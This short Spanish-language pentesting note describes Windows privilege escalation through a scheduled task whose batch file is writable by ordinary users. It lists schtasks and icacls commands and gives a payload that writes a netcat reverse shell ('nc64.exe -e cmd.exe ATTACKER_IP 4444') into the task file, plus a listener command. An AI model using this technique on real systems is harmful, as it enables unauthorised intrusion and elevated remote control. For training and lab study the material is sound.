Otras escaladas
Tareas programadas
Al examinar las tareas programadas en el la maquina victima, es posible que veas una tarea programada que ha perdido su binario o que directamente está utilizando un binario que puede modificar. Pueden listarse desde la línea de comandos: schtasks
schtasks /query /tn vulntask /fo list /v
Para comprobar los permisos de archivo, icacls
:
El grupo BUILTIN\Users tiene acceso completo (F) sobre el binario de la tarea. Esto significa que podemos modificar el archivo .bat e insertar el payload que queramos
Payload --> C:\> echo c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 4444 > C:\tasks\schtask.bat
Nos pondríamos en escucha con netcat en nuestra maquina nc -lvp 4444
Last updated